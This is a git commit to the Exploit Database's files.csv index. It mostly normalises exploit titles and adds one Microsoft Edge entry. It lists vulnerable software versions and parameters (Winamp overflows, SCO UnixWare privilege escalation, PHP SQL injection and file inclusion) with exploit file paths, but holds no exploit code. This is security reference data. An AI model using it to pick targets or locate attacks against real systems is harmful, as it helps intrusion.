DB: 2016-11-18

3 new exploits

Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)
Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)

Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)
NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)

Apple Mac OSX 10.4.x Kernel -  i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)

Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)

WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)
Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)

Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)

Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
WinAmp 5.63 - Invalid Pointer Dereference
WinAmp 5.63 - Stack Based Buffer Overflow
Winamp 5.63 - Invalid Pointer Dereference
Winamp 5.63 - Stack Based Buffer Overflow

Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)
Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)

Microsoft Edge - 'eval' Type Confusion

Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow
NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow
SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation
SCO UnixWare Reliant HA - Privilege Escalation
SCO UnixWare Merge - mcd Privilege Escalation
Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow
SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation
SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation
SCO UnixWare Merge - 'mcd' Privilege Escalation

Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.572 - whatsnew.txt Stack Overflow
Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow
Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow

Winamp 5.572 - whatsnew.txt SEH (Metasploit)
Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)

Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)
Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)

Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking

WinAmp 5.63 - (winamp.ini) Local Exploit
Winamp 5.63 - 'winamp.ini' Local Exploit

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)

Nullsoft Winamp 2.x - AIP Buffer Overflow
NullSoft Winamp 2.x - AIP Buffer Overflow

Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow
NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow

winamp Web interface 7.5.13 - Multiple Vulnerabilities
Winamp Web interface 7.5.13 - Multiple Vulnerabilities

Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow
NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow

LinPHA 1.3.1 - (new_images.php) Blind SQL Injection
LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection

KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection
KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection

KwsPHP 1.0 - Newsletter Module SQL Injection
KwsPHP 1.0 Module Newsletter - SQL Injection
DaZPHP 0.1 - (prefixdir) Local File Inclusion
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion
KwsPHP Module Galerie - (id_gal) SQL Injection
KwsPHP Module Archives - 'id' SQL Injection
KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection
KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection
XPOZE Pro 3.05 - (reed) SQL Injection
Vastal I-Tech Software Zone - 'cat_id' SQL Injection
sabros.us 1.75 - (thumbnails.php) Remote File Disclosure
Comdev News Publisher - SQL Injection
Affiliate Directory - 'cat_id' SQL Injection
PHP Photo Gallery 1.0 - (photo_id) SQL Injection
Blogator-script 0.95 - (incl_page) Remote File Inclusion
PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection
Blogator-script 0.95 - (id_art) SQL Injection
Dragoon 0.1 - (lng) Local File Inclusion
DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion
PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion
KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection
KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection
KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection
KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection
XPOZE Pro 3.05 - 'reed' Parameter SQL Injection
Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection
Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure
Comdev News Publisher 4.1.2 - SQL Injection
Affiliate Directory - 'cat_id' Parameter SQL Injection
PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection
Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion
PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection
Blogator-script 0.95 - 'id_art' Parameter SQL Injection
Dragoon 0.1 - 'lng' Parameter Local File Inclusion
Easynet Forum Host - 'forum.php forum' SQL Injection
CoBaLT 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' SQL Injection
Easynet Forum Host - 'forum.php' SQL Injection
Cobalt 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection
Links Directory 1.1 - 'cat_id' SQL Injection
Software Index 1.1 - 'cid' SQL Injection
Links Directory 1.1 - 'cat_id' Parameter SQL Injection
Software Index 1.1 - 'cid' Parameter SQL Injection
Blog PixelMotion - 'index.php categorie' SQL Injection
Site Sift Listings - 'id' SQL Injection
Blog PixelMotion - 'categorie' Parameter SQL Injection
Site Sift Listings - 'id' Parameter SQL Injection

Prozilla Forum Service - 'forum.php forum' SQL Injection
Prozilla Forum Service - 'forum' Parameter SQL Injection

Prozilla Freelancers - (project) SQL Injection
Prozilla Freelancers - 'project' Parameter SQL Injection
LinPHA 1.3.3 - (maps plugin) Remote Command Execution
Dragoon 0.1 - (root) Remote File Inclusion
LinPHA 1.3.3 Plugin Maps - Remote Command Execution
Dragoon 0.1 - 'root' Parameter Remote File Inclusion

k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
k-links directory - SQL Injection / Cross-Site Scripting

SFS Affiliate Directory - 'id' SQL Injection
Affiliate Directory - 'id' Parameter SQL Injection

SFS EZ Gaming Directory - 'Directory.php id' SQL Injection
SFS EZ Gaming Directory - 'directory.php' SQL Injection

SFS EZ Gaming Directory - 'cat_id' SQL Injection
SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection

LinPHA 1.3.2 - (rotate.php) Remote Command Execution
LinPHA 1.3.2 - 'rotate.php' Remote Command Execution

cobalt qube webmail 1.0 - Directory Traversal
Cobalt Qube Webmail 1.0 - Directory Traversal
LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion
LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion

LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities

Drake CMS 0.2 - 'index.php' Cross-Site Scripting

Sabros.US 1.7 - 'index.php' Cross-Site Scripting

Drake CMS 0.3.7 - 404.php Local File Inclusion
Drake CMS 0.3.7 - '404.php' Local File Inclusion

Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting

Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting

CoBaLT 2.0 - 'adminler.asp' SQL Injection
Cobalt 2.0 - 'adminler.asp' SQL Injection

VisualPic 0.3.1 - Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting

Software Index - 'signinform.php' Cross-Site Scripting

CMSimple 4.4.4 - Remote file Inclusion
CMSimple 4.4.4 - Remote File Inclusion
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
This commit is contained in:
Offensive Security 2016-11-18 05:01:22 +00:00
parent e1c4e9e1ec
commit b22e31535e
20 changed files with 187 additions and 1270 deletions

155
files.csv
View file

@ -349,7 +349,7 @@ id,file,description,date,author,platform,type,port
1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0
1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0
1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0
1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0
1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0
@ -408,7 +408,7 @@ id,file,description,date,author,platform,type,port
2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0
2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0
2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0
2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0
@ -656,7 +656,7 @@ id,file,description,date,author,platform,type,port
4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0
4613,platforms/windows/dos/4613.html,"Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0
4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0
4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0
4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0
4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0
4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0
@ -717,7 +717,7 @@ id,file,description,date,author,platform,type,port
5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0
5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0
5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0
@ -899,7 +899,7 @@ id,file,description,date,author,platform,type,port
7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0
7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0
7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0
@ -1357,7 +1357,7 @@ id,file,description,date,author,platform,type,port
11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0
11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0
11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos,0
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,windows,dos,0
@ -3305,7 +3305,7 @@ id,file,description,date,author,platform,type,port
25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0
25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos,0
25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0
25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0
25061,platforms/windows/dos/25061.txt,"NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0
25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0
25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0
25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0
@ -3433,8 +3433,8 @@ id,file,description,date,author,platform,type,port
26526,platforms/windows/dos/26526.py,"VideoLAN VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0
26548,platforms/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos,0
26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0
26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0
26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0
26557,platforms/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0
26558,platforms/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0
26575,platforms/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",windows,dos,0
26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,windows,dos,0
26601,platforms/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0
@ -4439,7 +4439,7 @@ id,file,description,date,author,platform,type,port
35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0
35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
35842,platforms/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0
35849,platforms/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,multiple,dos,0
@ -5264,6 +5264,7 @@ id,file,description,date,author,platform,type,port
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5787,7 +5788,7 @@ id,file,description,date,author,platform,type,port
4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Stack Overflow",2007-12-18,devcode,windows,local,0
4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow",2007-12-18,"SYS 49152",windows,local,0
4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0
@ -5814,10 +5815,9 @@ id,file,description,date,author,platform,type,port
5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0
5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0
5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation",2008-04-04,qaaz,sco,local,0
5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Privilege Escalation",2008-04-04,qaaz,sco,local,0
5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Privilege Escalation",2008-04-04,qaaz,sco,local,0
5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0
5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation",2008-04-04,qaaz,sco,local,0
5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation",2008-04-04,qaaz,sco,local,0
5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Privilege Escalation",2008-04-04,qaaz,sco,local,0
5424,platforms/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0
5442,platforms/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local,0
5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local,0
@ -6264,7 +6264,7 @@ id,file,description,date,author,platform,type,port
11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
11139,platforms/windows/local/11139.c,"Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow",2010-01-16,Dz_attacker,windows,local,0
@ -6279,8 +6279,8 @@ id,file,description,date,author,platform,type,port
11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0
11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0
11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - SEH Exploit",2010-01-26,TecR0c,windows,local,0
11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0
@ -6343,7 +6343,7 @@ id,file,description,date,author,platform,type,port
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)",2010-04-16,blake,windows,local,0
12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
